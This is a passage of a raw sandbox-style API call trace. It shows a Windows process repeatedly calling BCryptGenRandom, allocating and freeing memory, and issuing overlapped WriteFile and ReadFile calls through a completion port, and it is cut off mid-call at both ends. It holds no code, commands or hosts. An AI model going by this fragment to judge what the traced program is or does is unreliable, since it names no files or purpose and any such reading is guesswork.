(hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0177.904] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2faf970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x2faf970) returned 0x0 [0177.905] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0177.905] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0177.905] free (_Block=0x3e305b8) [0177.905] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0177.905] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0177.905] free (_Block=0x1fa91d0) [0177.905] free (_Block=0x1fa2ed8) [0177.905] free (_Block=0x1fa90b8) [0177.905] WriteFile (in: hFile=0x338, lpBuffer=0x1ff1e94, nNumberOfBytesToWrite=0x618, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 0x0 [0177.906] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0177.911] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0177.912] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0177.912] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2fafc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2fafc30) returned 0x0 [0177.912] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0177.912] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0177.912] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2faf970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x2faf970) returned 0x0 [0177.913] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0177.913] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0177.913] free (_Block=0x3e305b8) [0177.913] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0177.913] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0177.913] free (_Block=0x1fa91d0) [0177.913] free (_Block=0x1fa2ed8) [0177.913] free (_Block=0x1fa90b8) [0177.913] WriteFile (in: hFile=0x2a8, lpBuffer=0x3d70484*, nNumberOfBytesToWrite=0x61a, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450) returned 1 [0177.914] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0177.943] ReadFile (in: hFile=0x2a8, lpBuffer=0x3d70484, nNumberOfBytesToRead=0x8b6, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450) returned 0x0 [0177.944] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0177.990] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0177.991] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0177.991] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2fafc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2fafc30) returned 0x0 [0177.991] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0177.991] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0177.991] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2faf970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x2faf970) returned 0x0 [0177.992] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0177.992] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0177.992] free (_Block=0x3e305b8) [0177.992] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0177.992] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0177.992] free (_Block=0x1fa91d0) [0177.992] free (_Block=0x1fa2ed8) [0177.992] free (_Block=0x1fa90b8) [0177.992] WriteFile (in: hFile=0x2a8, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x61e, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0177.993] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0177.995] WriteFile (in: hFile=0x2a8, lpBuffer=0x3df003c, nNumberOfBytesToWrite=0xbdf0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 0x0 [0177.995] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0178.405] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0178.406] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0178.406] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2fafc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2fafc30) returned 0x0 [0178.406] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0178.406] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0178.406] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2faf970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x2faf970) returned 0x0 [0178.407] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0178.407] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0178.407] free (_Block=0x3e305b8) [0178.407] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0178.407] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0178.407] free (_Block=0x1fa91d0) [0178.407] free (_Block=0x1fa2ed8) [0178.407] free (_Block=0x1fa90b8) [0178.407] WriteFile (in: hFile=0x338, lpBuffer=0x1ff1e94*, nNumberOfBytesToWrite=0x612, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 1 [0178.409] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0178.411] WriteFile (in: hFile=0x338, lpBuffer=0x1ff1e94, nNumberOfBytesToWrite=0x1d60, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 0x0 [0178.412] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0178.503] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0178.503] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0178.503] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2fafc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2fafc30) returned 0x0 [0178.503] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0178.503] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0178.503] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2faf970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x2faf970) returned 0x0 [0178.504] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0178.504] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0178.504] free (_Block=0x3e305b8) [0178.504] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0178.504] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0178.504] free (_Block=0x1fa91d0) [0178.504] free (_Block=0x1fa2ed8) [0178.504] free (_Block=0x1fa90b8) [0178.504] WriteFile (in: hFile=0x2a8, lpBuffer=0x3df003c, nNumberOfBytesToWrite=0x614, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 0x0 [0178.504] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0178.538] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0178.538] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0178.538] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2fafc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2fafc30) returned 0x0 [0178.538] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0178.539] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0178.539] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2faf970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x2faf970) returned 0x0 [0178.539] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0178.539] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0178.539] free (_Block=0x3e305b8) [0178.539] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0178.539] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0178.539] free (_Block=0x1fa91d0) [0178.539] free (_Block=0x1fa2ed8) [0178.539] free (_Block=0x1fa90b8) [0178.539] WriteFile (in: hFile=0x338, lpBuffer=0x1ff1e94*, nNumberOfBytesToWrite=0x616, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 1 [0178.540] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0178.585] WriteFile (in: hFile=0x338, lpBuffer=0x1ff1e94, nNumberOfBytesToWrite=0x1760, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 0x0 [0178.585] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0178.623] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0178.623] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0178.623] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2fafc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2fafc30) returned 0x0 [0178.623] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0178.623] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0178.625] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2faf970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x2faf970) returned 0x0 [0178.625] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0178.625] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0178.625] free (_Block=0x3e305b8) [0178.625] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0178.625] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0178.625] free (_Block=0x1fa91d0) [0178.625] free (_Block=0x1fa2ed8) [0178.625] free (_Block=0x1fa90b8) [0178.625] WriteFile (in: hFile=0x2a8, lpBuffer=0x3df003c, nNumberOfBytesToWrite=0x61e, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 0x0 [0178.626] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0178.782] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0178.783] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0178.783] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2fafc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2fafc30) returned 0x0 [0178.783] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0178.783] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0178.783] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2faf970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x2faf970) returned 0x0 [0178.783] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0178.783] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0178.783] free (_Block=0x3e305b8) [0178.783] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0178.783] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0178.784] free (_Block=0x1fa91d0) [0178.784] free (_Block=0x1fa2ed8) [0178.784] free (_Block=0x1fa90b8) [0178.784] WriteFile (in: hFile=0x338, lpBuffer=0x1ff1e94*, nNumberOfBytesToWrite=0x61c, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 1 [0178.784] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0179.375] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0179.376] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0179.376] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2fafc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2fafc30) returned 0x0 [0179.376] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0179.400] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0179.401] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2faf970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x2faf970) returned 0x0 [0179.402] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0179.402] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0179.402] free (_Block=0x3e305b8) [0179.402] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0179.402] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0179.402] free (_Block=0x1fa91d0) [0179.402] free (_Block=0x1fa2ed8) [0179.402] free (_Block=0x1fa90b8) [0179.402] WriteFile (in: hFile=0x2a4, lpBuffer=0x3d70484*, nNumberOfBytesToWrite=0x610, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450) returned 1 [0179.403] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0179.404] WriteFile (in: hFile=0x2a4, lpBuffer=0x3d70484, nNumberOfBytesToWrite=0x1bc0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450) returned 0x0 [0179.405] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0179.456] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0179.560] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0179.560] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2fafc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2fafc30) returned 0x0 [0179.560] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0179.560] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0179.560] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2faf970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x2faf970) returned 0x0 [0179.561] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0179.561] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0179.561] free (_Block=0x3e305b8) [0179.561] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0179.561] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0179.561] free (_Block=0x1fa91d0) [0179.561] free (_Block=0x1fa2ed8) [0179.561] free (_Block=0x1fa90b8) [0179.561] WriteFile (in: hFile=0x2a4, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x614, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0179.573] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0179.574] WriteFile (in: hFile=0x2a8, lpBuffer=0x1ff1e94, nNumberOfBytesToWrite=0x25c0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 0x0 [0179.574] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0179.586] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0179.587] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0179.587] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2fafc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2fafc30) returned 0x0 [0179.587] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0179.587] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0179.587] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2faf970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x2faf970) returned 0x0 [0179.587] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0179.588] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0179.588] free (_Block=0x3e305b8) [0179.588] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0179.588] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0179.588] free (_Block=0x1fa91d0) [0179.588] free (_Block=0x1fa2ed8) [0179.588] free (_Block=0x1fa90b8) [0179.588] WriteFile (in: hFile=0x2a4, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x61c, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0179.588] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0179.589] WriteFile (in: hFile=0x2a4, lpBuffer=0x3df003c, nNumberOfBytesToWrite=0x1240, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 0x0 [0179.589] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0179.636] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0179.647] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0179.647] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2fafc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2fafc30) returned 0x0 [0179.647] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0179.647] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0179.647] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2faf970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x2faf970) returned 0x0 [0179.648] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0179.648] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0179.648] free (_Block=0x3e305b8) [0179.648] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0179.648] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0179.648] free (_Block=0x1fa91d0) [0179.648] free (_Block=0x1fa2ed8) [0179.648] free (_Block=0x1fa90b8) [0179.648] WriteFile (in: hFile=0x2a4, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x614, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0179.649] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0179.673] WriteFile (in: hFile=0x2a8, lpBuffer=0x1ff1e94, nNumberOfBytesToWrite=0x2150, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 0x0 [0179.673] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0179.703] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0179.703] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0179.703] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2fafc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2fafc30) returned 0x0 [0179.703] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0179.703] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0179.703] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2faf970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x2faf970) returned 0x0 [0179.704] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0179.704] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0179.704] free (_Block=0x3e305b8) [0179.704] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0179.704] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0179.704] free (_Block=0x1fa91d0) [0179.704] free (_Block=0x1fa2ed8) [0179.704] free (_Block=0x1fa90b8) [0179.704] WriteFile (in: hFile=0x338, lpBuffer=0x3f7007c*, nNumberOfBytesToWrite=0x616, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3f70048 | out: lpBuffer=0x3f7007c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3f70048) returned 1 [0179.705] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0179.771] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0179.771] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0179.771] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2fafc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2fafc30) returned 0x0 [0179.771] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0179.772] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0179.772] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2faf970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x2faf970) returned 0x0 [0179.772] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0179.772] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0179.772] free (_Block=0x3e305b8) [0179.772] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0179.772] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0179.772] free (_Block=0x1fa91d0) [0179.772] free (_Block=0x1fa2ed8) [0179.773] free (_Block=0x1fa90b8) [0179.773] WriteFile (in: 